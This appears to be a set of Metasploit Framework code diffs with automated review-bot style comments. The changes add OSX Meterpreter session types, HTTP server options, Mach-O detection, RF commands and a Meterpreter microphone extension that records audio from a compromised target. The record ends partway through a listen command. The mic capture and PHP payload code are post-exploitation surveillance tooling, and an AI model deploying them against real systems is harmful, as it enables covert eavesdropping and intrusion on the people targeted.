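Review bot: `supports_ssl?` and `supports_zlib?` in Meterpreter_x64_OSX override the parent's answers with no comment recording why this session type opts out of both, and the Meterpreter_x86_OSX class in the next section has the same gap. A one-line comment above each, such as `# NOTE: the OSX meterpreter session does not support transport SSL (presumably a limitation of that payload build - confirm)`, would save the next maintainer from re-deriving the reason; the class header comment only says it is platform-specific. As a point of style, `def initialize(rstream, opts={})` should be `def initialize(rstream, opts = {})`, and since the two classes differ only in the `base_arch` assignment, the duplicated predicate methods could live in one shared OSX base class.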


@ -0,0 +1,29 @@
# -*- coding: binary -*-
require 'msf/base/sessions/meterpreter'
module Msf
module Sessions
###
#
# This class creates a platform-specific meterpreter session type
#
###
class Meterpreter_x86_OSX < Msf::Sessions::Meterpreter
def supports_ssl?
false
end
def supports_zlib?
false
end
def initialize(rstream, opts={})
super
self.base_platform = 'osx'
self.base_arch = ARCH_X86
end
end
end
end


@ -3,7 +3,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
## ##
module Msf module Msf


@ -3,7 +3,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
## ##
module Msf module Msf


@ -3,7 +3,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
## ##
module Msf module Msf


@ -2,7 +2,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
require 'net/https' require 'net/https'
require 'net/http' require 'net/http'


@ -2,7 +2,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
require 'net/https' require 'net/https'
require 'net/http' require 'net/http'


@ -3,7 +3,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
## ##
require 'uri' require 'uri'


@ -2,7 +2,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
require 'net/https' require 'net/https'
require 'net/http' require 'net/http'


@ -2,7 +2,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
require 'net/https' require 'net/https'
require 'net/http' require 'net/http'


@ -3,7 +3,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
require 'msf/core/auxiliary' require 'msf/core/auxiliary'


@ -810,6 +810,7 @@ module Msf
%Q|<html> %Q|<html>
<head> <head>
<meta http-equiv="cache-control" content="no-cache" />
<script> <script>
#{js} #{js}
</script> </script>


@ -32,6 +32,7 @@ module Exploit::Remote::HttpServer
register_evasion_options( register_evasion_options(
[ [
OptBool.new('HTTP::no_cache', [false, 'Disallow the browser to cache HTTP content', false]),
OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', false]), OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', false]),
OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', false]), OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', false]),
OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', false]), OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', false]),
@ -42,7 +43,8 @@ module Exploit::Remote::HttpServer
register_advanced_options([ register_advanced_options([
OptAddress.new('URIHOST', [false, 'Host to use in URI (useful for tunnels)']), OptAddress.new('URIHOST', [false, 'Host to use in URI (useful for tunnels)']),
OptPort.new('URIPORT', [false, 'Port to use in URI (useful for tunnels)']) OptPort.new('URIPORT', [false, 'Port to use in URI (useful for tunnels)']),
OptBool.new('SendRobots', [false, 'Return a robots.txt file if asked for one', false])
]) ])
# Used to keep track of resources added to the service manager by # Used to keep track of resources added to the service manager by
@ -179,7 +181,26 @@ module Exploit::Remote::HttpServer
print_status("Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}") print_status("Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
end end
if datastore['SendRobots']
add_robots_resource
end
add_resource(uopts) add_resource(uopts)
end
def add_robots_resource
proc = Proc.new do |cli, req|
self.cli = cli
send_robots(cli, req)
end
vprint_status('Adding hardcoded URI /robots.txt')
begin
add_resource('Path' => '/robots.txt', 'Proc' => proc)
rescue RuntimeError => e
print_warning(e.message)
end
end end
# Set {#on_request_uri} to handle the given +uri+ in addition to the one # Set {#on_request_uri} to handle the given +uri+ in addition to the one
@ -558,6 +579,10 @@ module Exploit::Remote::HttpServer
response.headers.junk_headers = 1 response.headers.junk_headers = 1
end end
if datastore['HTTP::no_cache']
response.headers['Cache-Control'] = 'no-store, no-cache, must-revalidate'
end
headers.each_pair { |k,v| response[k] = v } headers.each_pair { |k,v| response[k] = v }
cli.send_response(response) cli.send_response(response)
@ -605,6 +630,22 @@ module Exploit::Remote::HttpServer
cli.send_response(resp_404) cli.send_response(resp_404)
end end
#
# Sends a canned robots.txt file
#
def send_robots(cli, request)
print_status('Sending robots.txt')
robots = create_response(200, 'Success')
robots['Content-Type'] = 'text/plain'
robots.body = %Q{\
User-agent: *
Disallow: /
}
cli.send_response(robots)
end
# #
# Returns the configured (or random, if not configured) URI path # Returns the configured (or random, if not configured) URI path
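Review bot: In `add_robots_resource` the handler is stored in a local named `proc`, which shadows `Kernel#proc` for the rest of the method, and `send_robots(cli, request)` never reads `request`; renaming the local (`handler = Proc.new do |cli, req|` … `'Proc' => handler`) and marking the parameter `_request` would make the intent clear. The two helpers also log at different levels: `add_robots_resource` uses `vprint_status`, while `send_robots` calls `print_status('Sending robots.txt')` on every fetch, so any crawler hitting the server produces an unconditional status line — `vprint_status` there would be consistent. `add_robots_resource` has no header comment, unlike `send_robots`; something like `# Registers the /robots.txt handler when SendRobots is set; a path conflict is reported with print_warning instead of raised.` would match the file's style.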


@ -4,7 +4,7 @@
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ # https://metasploit.com/framework/
## ##
### ###

8
lib/msf/core/exploit/smtp_deliver.rb Normal file → Executable file

@ -184,7 +184,7 @@ module Exploit::Remote::SMTPDeliver
raw_send_recv("MAIL FROM: <#{mailfrom}>\r\n", nsock) raw_send_recv("MAIL FROM: <#{mailfrom}>\r\n", nsock)
res = raw_send_recv("RCPT TO: <#{mailto}>\r\n", nsock) res = raw_send_recv("RCPT TO: <#{mailto}>\r\n", nsock)
if res[0..2] == '250' if res && res[0..2] == '250'
resp = raw_send_recv("DATA\r\n", nsock) resp = raw_send_recv("DATA\r\n", nsock)
# If the user supplied a Date field, use that, else use the current # If the user supplied a Date field, use that, else use the current
@ -242,10 +242,12 @@ module Exploit::Remote::SMTPDeliver
# to dump it all. # to dump it all.
vprint_status("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}") vprint_status("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}")
end end
begin
nsock.put(cmd) nsock.put(cmd)
res = nsock.get_once res = nsock.get_once
rescue
return nil
end
# Don't truncate the server output because it might be helpful for # Don't truncate the server output because it might be helpful for
# debugging. # debugging.
vprint_status("S: #{res.strip}") if res vprint_status("S: #{res.strip}") if res
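Review bot: The bare `rescue` around `nsock.put(cmd)` / `res = nsock.get_once` catches every `StandardError` — including a `NoMethodError` from a nil `nsock` — and turns it into a silent `return nil`, so a programming error becomes indistinguishable from "the server did not answer". Rescuing only the I/O failures the socket can raise (`::EOFError`, `::Errno::ECONNRESET`, `Rex::TimeoutError`) and logging with `vprint_error("Socket error: #{e.message}")` before returning nil keeps the new nil contract without hiding bugs. The first hunk's `res && res[0..2] == '250'` handles that nil for RCPT TO, but the `resp = raw_send_recv("DATA\r\n", nsock)` that follows is not checked within the hunk. Both enclosing methods begin and end outside the visible hunks.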


@ -173,7 +173,8 @@ class Msf::Modules::Loader::Base
true true
} }
loaded = namespace_module_transaction(type + "/" + module_reference_name, :reload => reload, &try_eval_module) loaded = namespace_module_transaction(type + "/" + module_reference_name,
:reload => reload, &try_eval_module)
unless loaded unless loaded
return false return false
end end


@ -28,12 +28,11 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
def each_module_reference_name(path, opts={}) def each_module_reference_name(path, opts={})
whitelist = opts[:whitelist] || [] whitelist = opts[:whitelist] || []
::Dir.foreach(path) do |entry| ::Dir.foreach(path) do |entry|
full_entry_path = ::File.join(path, entry) full_entry_path = ::File.join(path, entry)
type = entry.singularize type = entry.singularize
unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type) next unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type)
next
end
full_entry_pathname = Pathname.new(full_entry_path) full_entry_pathname = Pathname.new(full_entry_path)
@ -43,6 +42,7 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
entry_descendant_pathname = Pathname.new(entry_descendant_path) entry_descendant_pathname = Pathname.new(entry_descendant_path)
relative_entry_descendant_pathname = entry_descendant_pathname.relative_path_from(full_entry_pathname) relative_entry_descendant_pathname = entry_descendant_pathname.relative_path_from(full_entry_pathname)
relative_entry_descendant_path = relative_entry_descendant_pathname.to_s relative_entry_descendant_path = relative_entry_descendant_pathname.to_s
next if File::basename(relative_entry_descendant_path) == "example.rb"
# The module_reference_name doesn't have a file extension # The module_reference_name doesn't have a file extension
module_reference_name = module_reference_name_from_path(relative_entry_descendant_path) module_reference_name = module_reference_name_from_path(relative_entry_descendant_path)
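Review bot: `next if File::basename(relative_entry_descendant_path) == "example.rb"` hard-codes a special filename in the middle of the loop with nothing saying why that one file is skipped. Moving the literal to a named class constant (`EXAMPLE_MODULE_BASENAME = 'example.rb'.freeze`) with a one-line comment on the reason, and using `File.basename` to match the `::File.join` / `::File.directory?` calls above, would make the rule discoverable. The enclosing `each_module_reference_name` continues past the hunk.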


@ -103,7 +103,7 @@ module Msf::Payload::Php
}else" }else"
proc_open = " proc_open = "
if(#{is_callable}('proc_open')and!#{in_array}('proc_open',#{dis})){ if(#{is_callable}('proc_open')and!#{in_array}('proc_open',#{dis})){
$handle=proc_open(#{cmd},array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); $handle=proc_open(#{cmd},array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
#{output}=NULL; #{output}=NULL;
while(!feof($pipes[1])){ while(!feof($pipes[1])){
#{output}.=fread($pipes[1],1024); #{output}.=fread($pipes[1],1024);


@ -278,6 +278,16 @@ module RFTransceiver
return_success(r) return_success(r)
end end
#
# Sets lowball. Ensure you set the frequency first before using this
# @return [Boolean] success value
def set_lowball
return false unless is_rf?
self.index ||= 0
r = client.rftransceiver.set_lowball(self.index)
return_success(r)
end
# #
# Set power level # Set power level
# @param level [Integer] Power level # @param level [Integer] Power level


@ -21,3 +21,4 @@ end
# Executable generation and encoding # Executable generation and encoding
require 'msf/util/exe' require 'msf/util/exe'
require 'msf/util/helper'


@ -106,7 +106,7 @@ require 'msf/core/exe/segment_appender'
# @return [String] # @return [String]
# @return [NilClass] # @return [NilClass]
def self.to_executable(framework, arch, plat, code = '', opts = {}) def self.to_executable(framework, arch, plat, code = '', opts = {})
if elf? code if elf? code or macho? code
return code return code
end end
@ -2148,6 +2148,9 @@ require 'msf/core/exe/segment_appender'
end end
end end
when 'macho', 'osx-app' when 'macho', 'osx-app'
if macho? code
macho = code
else
macho = case arch macho = case arch
when ARCH_X86,nil when ARCH_X86,nil
to_osx_x86_macho(framework, code, exeopts) to_osx_x86_macho(framework, code, exeopts)
@ -2158,6 +2161,7 @@ require 'msf/core/exe/segment_appender'
when ARCH_PPC when ARCH_PPC
to_osx_ppc_macho(framework, code, exeopts) to_osx_ppc_macho(framework, code, exeopts)
end end
end
fmt == 'osx-app' ? Msf::Util::EXE.to_osx_app(macho) : macho fmt == 'osx-app' ? Msf::Util::EXE.to_osx_app(macho) : macho
when 'vba' when 'vba'
Msf::Util::EXE.to_vba(framework, code, exeopts) Msf::Util::EXE.to_vba(framework, code, exeopts)
@ -2284,6 +2288,10 @@ require 'msf/core/exe/segment_appender'
code[0..3] == "\x7FELF" code[0..3] == "\x7FELF"
end end
def self.macho?(code)
code[0..3] == "\xCF\xFA\xED\xFE" || code[0..3] == "\xCE\xFA\xED\xFE" || code[0..3] == "\xCA\xFE\xBA\xBE"
end
end end
end end
end end
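Review bot: `macho?` compares `code[0..3]` against literals containing non-ASCII bytes, so the result depends on the encoding of `code`: `String#==` is false when the two sides have different encodings and are not ASCII-only, a case `elf?`'s ASCII-only `"\x7FELF"` never hits. Normalising both sides to binary, e.g. `MACHO_MAGICS.include?(code.to_s.b[0, 4])` with `MACHO_MAGICS` a frozen array of the three `.b` literals, removes that dependence. Note also that `"\xCA\xFE\xBA\xBE"` is the Java class-file magic as well as the Mach-O fat-binary magic, so a `.class` blob passed as `code` now bypasses wrapping in `to_executable`; that deserves a comment on the constant. In `to_executable`, `if elf? code or macho? code` should use `||`, which the style guide prefers for boolean logic because of `or`'s low precedence.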

21
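--- a/lib/msf/util/helper.rb
+++ b/lib/msf/util/helper.rb
@@ -0,0 +1,21 @@
+# -*- coding: binary -*-
+module Msf
+module Util
+class Helper
+# Cross-platform way of finding an executable in the $PATH.
+#
+# which('ruby') #=> /usr/bin/ruby
+def self.which(cmd)
+exts = ENV['PATHEXT'] ? ENV['PATHEXT'].split(';') : ['']
+ENV['PATH'].split(File::PATH_SEPARATOR).each do |path|
+exts.each { |ext|
+exe = File.join(path, "#{cmd}#{ext}")
+return exe if File.executable?(exe) && !File.directory?(exe)
+}
+end
+return nil
+end
+end
+end
+end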
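Review bot: `which` calls `ENV['PATH'].split(...)` unguarded, so in an environment where `PATH` is unset (a stripped-down service or cron environment, which is exactly where the gemspec's new `which("git")` check may run) it raises `NoMethodError` instead of returning nil. `ENV.fetch('PATH', '').split(File::PATH_SEPARATOR)` keeps the nil-return contract intact. The trailing `return nil` can be an implicit `nil` per the style guide, and the doc comment should state the contract: `# @return [String, nil] path of the first matching executable, or nil when none is found`.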


@ -4,7 +4,7 @@ require 'openssl/ccm'
require 'metasm' require 'metasm'
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##


@ -186,6 +186,10 @@ class RFTransceiver < Extension
client.send_request("/rftransceiver/#{idx}/set_number_preamble?num=#{num}") client.send_request("/rftransceiver/#{idx}/set_number_preamble?num=#{num}")
end end
def set_lowball(idx)
client.send_request("/rftransceiver/#{idx}/set_lowball")
end
def set_maxpower(idx) def set_maxpower(idx)
client.send_request("/rftransceiver/#{idx}/set_maxpower") client.send_request("/rftransceiver/#{idx}/set_maxpower")
end end


@ -34,6 +34,7 @@ class Console::CommandDispatcher::RFtransceiver
'deviation' => 'sets the deviation', 'deviation' => 'sets the deviation',
'sync_word' => 'sets the sync word', 'sync_word' => 'sets the sync word',
'preamble' => 'sets the preamble number', 'preamble' => 'sets the preamble number',
'lowball' => 'sets lowball',
'power' => 'sets the power level', 'power' => 'sets the power level',
'maxpower' => 'sets max power' 'maxpower' => 'sets max power'
} }
@ -528,6 +529,20 @@ class Console::CommandDispatcher::RFtransceiver
print_success(r) print_success(r)
end end
def cmd_lowball_help
print_line("Lowball is frequency dependent. Set frequency first")
end
def cmd_lowball(*args)
self.idx ||= 0
if args.length.positive?
cmd_lowball_help
return
end
r = client.rftransceiver.set_lowball(idx)
print_success(r)
end
def cmd_maxpower_help def cmd_maxpower_help
print_line("Max power is frequency dependent. Set frequency first") print_line("Max power is frequency dependent. Set frequency first")
end end


@ -195,19 +195,15 @@ class Dir < Rex::Post::Dir
# Downloads the contents of a remote directory a # Downloads the contents of a remote directory a
# local directory, optionally in a recursive fashion. # local directory, optionally in a recursive fashion.
# #
def Dir.download(dst, src, opts, force = true, glob = nil, &stat) def Dir.download(dst, src, opts = {}, force = true, glob = nil, &stat)
recursive = false
continue = false
tries = false
tries_no = 0
tries_cnt = 0 tries_cnt = 0
if opts
continue = opts["continue"]
recursive = opts["recursive"]
timestamp = opts["timestamp"] timestamp = opts["timestamp"]
recursive = true if opts["recursive"] tries_no = opts["tries_no"] || 0
continue = true if opts["continue"] tries = opts["tries"]
tries = true if opts["tries"]
tries_no = opts["tries_no"]
end
begin begin
dir_files = self.entries(src, glob) dir_files = self.entries(src, glob)
rescue Rex::TimeoutError rescue Rex::TimeoutError
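Review bot: Changing the default to `opts = {}` and dropping the `if opts` guard means a caller that still passes an explicit `nil` for `opts` — which the old signature accepted — now fails with `NoMethodError` on `opts["continue"]`. `opts ||= {}` as the first statement of the method restores that tolerance at no cost; the same applies to `File.download` and `File.download_file` in the next file section, where `opts["timestamp"]` and `opts["adaptive"]` now read the hash unguarded. `Dir.download` continues past this hunk.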


@ -301,8 +301,8 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
# If a block is given, it will be called before each file is downloaded and # If a block is given, it will be called before each file is downloaded and
# again when each download is complete. # again when each download is complete.
# #
def File.download(dest, src_files, opts = nil, &stat) def File.download(dest, src_files, opts = {}, &stat)
timestamp = opts["timestamp"] if opts timestamp = opts["timestamp"]
[*src_files].each { |src| [*src_files].each { |src|
if (::File.basename(dest) != File.basename(src)) if (::File.basename(dest) != File.basename(src))
# The destination when downloading is a local file so use this # The destination when downloading is a local file so use this
@ -324,18 +324,15 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
# #
# Download a single file. # Download a single file.
# #
def File.download_file(dest_file, src_file, opts = nil, &stat) def File.download_file(dest_file, src_file, opts = {}, &stat)
continue=false
tries=false
tries_no=0
stat ||= lambda { |a,b,c| } stat ||= lambda { |a,b,c| }
if opts adaptive = opts["adaptive"]
continue = true if opts["continue"] block_size = opts["block_size"] || 1024 * 1024
adaptive = true if opts['adaptive'] continue = opts["continue"]
tries = true if opts["tries"]
tries_no = opts["tries_no"] tries_no = opts["tries_no"]
end tries = opts["tries"]
src_fd = client.fs.file.new(src_file, "rb") src_fd = client.fs.file.new(src_file, "rb")
# Check for changes # Check for changes
@ -373,7 +370,6 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
end end
# Keep transferring until EOF is reached... # Keep transferring until EOF is reached...
block_size = (opts && opts['block_size']) || 1024 * 1024
begin begin
if tries if tries
# resume when timeouts encountered # resume when timeouts encountered


@ -0,0 +1,62 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter/channel'
require 'rex/post/meterpreter/channels/pools/stream_pool'
module Rex
module Post
module Meterpreter
module Extensions
module Stdapi
module Mic
###
#
# This meterpreter extension can list and capture from microphone
#
###
class Mic
def initialize(client)
@client = client
end
def session
@client
end
# List available microphones
def mic_list
response = client.send_request(Packet.create_request('audio_mic_list'))
names = []
if response.result == 0
response.get_tlvs(TLV_TYPE_AUDIO_INTERFACE_NAME).each do |tlv|
names << tlv.value
end
end
names
end
# Starts recording audio from microphone
def mic_start(device_id)
request = Packet.create_request('audio_mic_start')
request.add_tlv(TLV_TYPE_AUDIO_INTERFACE_ID, device_id)
response = client.send_request(request)
return nil unless response.result == 0
channel = Channel.create(client, 'audio_mic', Rex::Post::Meterpreter::Channels::Pools::StreamPool, CHANNEL_FLAG_SYNCHRONOUS)
end
# Stop recording from microphone
def mic_stop
client.send_request(Packet.create_request('audio_mic_stop'))
true
end
attr_accessor :client
end
end
end
end
end
end
end
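Review bot: `mic_start` ends with `channel = Channel.create(...)` and never reads the local; the expression is already the implicit return, so the assignment should go. `mic_list` accumulates `names` with `each`/`<<` where `response.get_tlvs(TLV_TYPE_AUDIO_INTERFACE_NAME).map(&:value)` says the same thing, and `session` duplicates the reader that `attr_accessor :client` already defines. The public methods have no YARD docs; for `mic_start` something like `# @param device_id [Integer] interface index as returned by the console listing (1-based there — confirm the extension expects the same)` and `# @return [Channel, nil] the audio stream channel, or nil when the request fails` would document the nil path callers must handle.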


@ -19,6 +19,7 @@ require 'rex/post/meterpreter/extensions/stdapi/sys/power'
require 'rex/post/meterpreter/extensions/stdapi/railgun/railgun' require 'rex/post/meterpreter/extensions/stdapi/railgun/railgun'
require 'rex/post/meterpreter/extensions/stdapi/ui' require 'rex/post/meterpreter/extensions/stdapi/ui'
require 'rex/post/meterpreter/extensions/stdapi/webcam/webcam' require 'rex/post/meterpreter/extensions/stdapi/webcam/webcam'
require 'rex/post/meterpreter/extensions/stdapi/mic/mic'
module Rex module Rex
module Post module Post
@ -83,6 +84,10 @@ class Stdapi < Extension
'name' => 'webcam', 'name' => 'webcam',
'ext' => Rex::Post::Meterpreter::Extensions::Stdapi::Webcam::Webcam.new(client) 'ext' => Rex::Post::Meterpreter::Extensions::Stdapi::Webcam::Webcam.new(client)
}, },
{
'name' => 'mic',
'ext' => Rex::Post::Meterpreter::Extensions::Stdapi::Mic::Mic.new(client)
},
{ {
'name' => 'ui', 'name' => 'ui',
'ext' => UI.new(client) 'ext' => UI.new(client)


@ -249,8 +249,10 @@ TLV_TYPE_WEBCAM_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4)
# #
## ##
TLV_TYPE_AUDIO_DURATION = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1) TLV_TYPE_AUDIO_DURATION = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 10)
TLV_TYPE_AUDIO_DATA = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 2) TLV_TYPE_AUDIO_DATA = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 11)
TLV_TYPE_AUDIO_INTERFACE_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 12)
TLV_TYPE_AUDIO_INTERFACE_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 13)
end; end; end; end; end end; end; end; end; end
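Review bot: Renumbering `TLV_TYPE_AUDIO_DURATION` and `TLV_TYPE_AUDIO_DATA` from `+1`/`+2` to `+10`/`+11` changes the wire identifiers of two existing TLVs, so this framework will not interoperate with already-deployed Meterpreter binaries built against the old numbering; the gemspec's bump to metasploit-payloads `1.2.44` presumably carries the matching side, but nothing here records that coupling. A comment next to the constants, e.g. `# NOTE: audio TLV ids changed in this commit; requires a metasploit-payloads build with the same numbering (see the gemspec pin)`, would spare the next person a protocol-level debugging session.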


@ -18,6 +18,7 @@ class Console::CommandDispatcher::Stdapi
require 'rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys' require 'rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys'
require 'rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui' require 'rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui'
require 'rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam' require 'rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam'
require 'rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic'
Klass = Console::CommandDispatcher::Stdapi Klass = Console::CommandDispatcher::Stdapi
@ -28,6 +29,7 @@ class Console::CommandDispatcher::Stdapi
Klass::Sys, Klass::Sys,
Klass::Ui, Klass::Ui,
Klass::Webcam, Klass::Webcam,
Klass::Mic
] ]
include Console::CommandDispatcher include Console::CommandDispatcher


@ -0,0 +1,201 @@
class Mic
end# -*- coding: binary -*-
require 'rex/post/meterpreter'
require 'bindata'
module Rex
module Post
module Meterpreter
module Ui
###
#
# Mic - Capture audio from the remote system
#
###
class Console::CommandDispatcher::Stdapi::Mic
Klass = Console::CommandDispatcher::Stdapi::Mic
include Console::CommandDispatcher
#
# List of supported commands.
#
def commands
all = {
'mic_start' => 'start capturing an audio stream from the target mic',
'mic_stop' => 'stop capturing audio',
'mic_list' => 'list all microphone interfaces',
'listen' => 'listen to a saved audio recording via audio player'
}
reqs = {
'mic_start' => [ 'audio_mic_start' ],
'mic_stop' => [ 'audio_mic_stop' ],
'mic_list' => [ 'audio_mic_list' ],
'listen' => [ 'audio_mic_start' ]
}
filter_commands(all, reqs)
end
#
# Name for this dispatcher
#
def name
"Stdapi: Mic"
end
def cmd_mic_list
client.mic.mic_list
if client.mic.mic_list.length == 0
print_error("No mics were found")
return
end
client.mic.mic_list.each_with_index do |name, indx|
print_line("#{indx + 1}: #{name}")
end
end
def audio_file_wave_header(sample_rate_hz:, num_channels:, bits_per_sample:, data_size:)
subchunk1_size = 16
chunk_size = 4 + (8 + subchunk1_size) + (8 + data_size)
byte_rate = sample_rate_hz * num_channels * bits_per_sample / 8
block_align = num_channels * bits_per_sample / 8
[
BinData::Int32be.new(0x52494646), # ChunkID: "RIFF"
BinData::Int32le.new(chunk_size), # ChunkSize
BinData::Int32be.new(0x57415645), # Format: "WAVE"
BinData::Int32be.new(0x666d7420), # SubChunk1ID: "fmt "
BinData::Int32le.new(16), # SubChunk1Size
BinData::Int16le.new(1), # AudioFormat
BinData::Int16le.new(num_channels), # NumChannels
BinData::Int32le.new(sample_rate_hz), # SampleRate
BinData::Int32le.new(byte_rate), # ByteRate
BinData::Int16le.new(block_align), # BlockAlign
BinData::Int16le.new(bits_per_sample), # BitsPerSample
BinData::Int32be.new(0x64617461), # SubChunk2ID: "data"
BinData::Int32le.new(data_size) # SubChunk2Size
]
end
def cmd_mic_start(*args)
get_data = lambda do |channel, file|
data = channel.read(65536)
if data
::File.open(file, 'a') do |f|
f.write(data)
end
return data.length
end
return 0
end
device_id = 1
duration = 1800
saved_audio_path = Rex::Text.rand_text_alpha(8) + ".wav"
mic_start_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner" ],
"-d" => [ true, "The stream duration in seconds (Default: 1800)" ], # 30 min
"-m" => [ true, "Microphone device index to record from (1: system default)" ],
"-s" => [ true, "The saved audio file path (Default: '#{saved_audio_path}')" ]
)
mic_start_opts.parse(args) do |opt, _idx, val|
case opt
when "-h"
print_line("Usage: mic_start [options]\n")
print_line("Streams and records audio from the target microphone.")
print_line(mic_start_opts.usage)
return
when "-d"
duration = val.to_i
when "-m"
device_id = val.to_i
when "-s"
saved_audio_path = val
end
end
mic_list = client.mic.mic_list
if mic_list.length == 0
print_error("Target does not have a mic")
return
end
if device_id < 1 || device_id > mic_list.length
print_error("Target does not have a mic with an id of #{device_id}")
return
end
channel = client.mic.mic_start(device_id)
if channel.nil?
print_error("Mic failed to start streaming.")
return
end
print_status("Saving to audio file: #{saved_audio_path}")
print_status("Streaming started...")
total_data_len = 0
begin
::File.open(saved_audio_path, 'wb') do |outfile|
audio_file_wave_header(sample_rate_hz: 11025, num_channels: 1, bits_per_sample: 16, data_size: 2_000_000_000).each {
|e| e.write(outfile)
}
end
::Timeout.timeout(duration) do
while client do
Rex::sleep(0.5)
total_data_len += get_data.call(channel, saved_audio_path)
end
end
rescue ::Timeout::Error
ensure
total_data_len += get_data.call(channel, saved_audio_path)
client.mic.mic_stop
print_status("Streaming stopped.")
# Now that we know the actual length of data, update the file header.
::File.open(saved_audio_path, 'rb+') do |outfile|
outfile.seek(0, ::IO::SEEK_SET)
audio_file_wave_header(sample_rate_hz: 11025, num_channels: 1, bits_per_sample: 16, data_size: total_data_len).each {
|e| e.write(outfile)
}
end
end
end
def cmd_listen(*args)
filename = nil
listen_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner" ],
"-f" => [ true, "audio filename" ]
)
listen_opts.parse(args) do |opt, _idx, val|
case opt
when "-h"
print_line("Usage: listen -f <filename>\n")
print_line("Plays saved audio from a file.")
print_line(listen_opts.usage)
return
when "-f"
filename = val
end
end
if filename.nil?
